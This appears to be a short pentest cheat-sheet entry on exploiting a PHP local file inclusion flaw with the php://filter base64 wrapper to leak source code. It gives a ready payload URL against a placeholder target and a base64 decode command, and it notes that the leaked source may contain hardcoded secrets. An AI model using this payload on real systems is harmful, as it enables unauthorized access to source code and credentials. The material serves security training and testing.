Read PHP Source via php://filter LFI
exploitationtool
Summary
Abuse an LFI with the php://filter base64 wrapper to leak PHP source code, then decode the returned blob locally.
Walkthrough
When a parameter is vulnerable to LFI, the php://filter wrapper lets you read PHP source instead of executing it.
Steps
- Request the target file through
php://filter/convert.base64-encode/resource=<file>so the source is returned base64-encoded rather than run. - Copy the encoded output and decode it locally with
base64 -dto recover the readable source (and any hardcoded secrets).
Commands
other
https://<TARGET>/admin/?debug=php://filter/convert.base64-encode/resource=master.php
bash
echo "PGgxPDQo/Pg==" | base64 -d > master.php